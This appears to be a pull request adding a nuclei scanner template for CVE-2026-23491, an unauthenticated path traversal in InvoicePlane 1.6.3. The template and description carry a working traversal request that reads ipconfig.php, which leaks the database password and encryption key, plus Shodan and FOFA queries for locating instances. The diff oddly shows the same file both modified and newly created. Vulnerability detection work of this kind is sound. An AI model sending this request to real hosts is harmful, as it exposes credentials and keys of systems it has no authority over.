### PR TITLE
Add CVE-2026-23491: InvoicePlane <= 1.6.3 unauthenticated arbitrary file read

### DIFF
--- a/http/cves/2026/CVE-2026-23491.yaml
+++ b/http/cves/2026/CVE-2026-23491.yaml
@@ -1,21 +1,15 @@
 id: CVE-2026-23491
 
 info:
-  name: InvoicePlane <= 1.6.3 - Unauthenticated Arbitrary File Read (Path Traversal)
+  name: InvoicePlane <= 1.6.3 - Arbitrary File Read
   author: str4k3r
   severity: high
   description: |
-    InvoicePlane through 1.6.3 is vulnerable to an unauthenticated path traversal
-    in the guest "Get::get_file()" controller. The supplied filename is passed to
-    readfile() after a single urldecode() with no directory-traversal validation,
-    allowing an unauthenticated attacker to read files outside the customer-files
-    upload directory - including the application's own "ipconfig.php", which
-    discloses the database credentials and the application ENCRYPTION_KEY. Fixed in
-    1.6.4 by the validate_file_access() helper.
+    InvoicePlane through 1.6.3 is vulnerable to an unauthenticated path traversal in the guest "Get::get_file()" controller. The supplied filename is passed to readfile() after a single urldecode() with no directory-traversal validation, allowing an unauthenticated attacker to read files outside the customer-files upload directory - including the application's own "ipconfig.php", which discloses the database credentials and the application ENCRYPTION_KEY. Fixed in 1.6.4 by the validate_file_access() helper.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-23491
     - https://github.com/InvoicePlane/InvoicePlane/security/advisories/GHSA-88gq-mv54-v3fc
     - https://github.com/InvoicePlane/InvoicePlane/releases/tag/v1.6.4
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-23491
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -27,14 +21,13 @@ info:
     product: invoiceplane
     vendor: invoiceplane
     shodan-query: http.html:"InvoicePlane"
-  tags: cve,cve2026,invoiceplane,lfi,path-traversal,fileread,unauth
+    fofa-query: body="InvoicePlane"
+  tags: cve,cve2026,invoiceplane,lfi,traversal
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/index.php/guest/get/get_file/..%2f..%2fipconfig.php"
-
-    stop-at-first-match: true
 
     matchers-condition: and
     matchers:
@@ -44,6 +37,11 @@ http:
           - "SETUP_COMPLETED="
           - "ENCRYPTION_KEY="
         condition: and
+
+      - type: word
+        part: content_disposition
+        words:
+          - "attachment"
 
       - type: status
         status:

--- a/http/cves/2026/CVE-2026-23491.yaml
+++ b/http/cves/2026/CVE-2026-23491.yaml
@@ -1,0 +1,50 @@
+id: CVE-2026-23491
+
+info:
+  name: InvoicePlane <= 1.6.3 - Unauthenticated Arbitrary File Read (Path Traversal)
+  author: str4k3r
+  severity: high
+  description: |
+    InvoicePlane through 1.6.3 is vulnerable to an unauthenticated path traversal
+    in the guest "Get::get_file()" controller. The supplied filename is passed to
+    readfile() after a single urldecode() with no directory-traversal validation,
+    allowing an unauthenticated attacker to read files outside the customer-files
+    upload directory - including the application's own "ipconfig.php", which
+    discloses the database credentials and the application ENCRYPTION_KEY. Fixed in
+    1.6.4 by the validate_file_access() helper.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-23491
+    - https://github.com/InvoicePlane/InvoicePlane/security/advisories/GHSA-88gq-mv54-v3fc
+    - https://github.com/InvoicePlane/InvoicePlane/releases/tag/v1.6.4
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-23491
+    cwe-id: CWE-22
+  metadata:
+    max-request: 1
+    verified: true
+    product: invoiceplane
+    vendor: invoiceplane
+    shodan-query: http.html:"InvoicePlane"
+  tags: cve,cve2026,invoiceplane,lfi,path-traversal,fileread,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php/guest/get/get_file/..%2f..%2fipconfig.php"
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "SETUP_COMPLETED="
+          - "ENCRYPTION_KEY="
+        condition: and
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### CVE-2026-23491 — InvoicePlane <= 1.6.3 Unauthenticated Arbitrary File Read (Path Traversal)

**Summary.** The `get_file()` method of the guest module's `Get` controller in
InvoicePlane (through 1.6.3) URL-decodes the requested filename once and passes it
straight to `readfile()` with no directory-traversal validation, letting an
unauthenticated attacker read files outside the `uploads/customer_files/` directory.
Fixed in 1.6.4 via the `validate_file_access()` helper.

**Detection.** Uses the vendor's own advisory PoC (GHSA-88gq-mv54-v3fc):

```
GET /index.php/guest/get/get_file/..%2f..%2fipconfig.php
```

On a vulnerable instance this returns HTTP 200 with the contents of the
application's `ipconfig.php`, disclosing `DB_PASSWORD` and `ENCRYPTION_KEY`. The
matcher keys on the InvoicePlane-specific `SETUP_COMPLETED=` and `ENCRYPTION_KEY=`
markers plus status 200, so it is self-contained (no OOB / interactsh).

**Validation.** Verified against real deployments (nginx + php-fpm, official 1.6.3
and 1.6.4 release builds) with the current nuclei engine: fires 3/3 on 1.6.3,
silent 3/3 on the patched 1.6.4 (which returns 404 through `validate_file_access()`).
`nuclei -validate` passes.

**References**
- https://nvd.nist.gov/vuln/detail/CVE-2026-23491
- https://github.com/InvoicePlane/InvoicePlane/security/advisories/GHSA-88gq-mv54-v3fc
- https://github.com/InvoicePlane/InvoicePlane/releases/tag/v1.6.4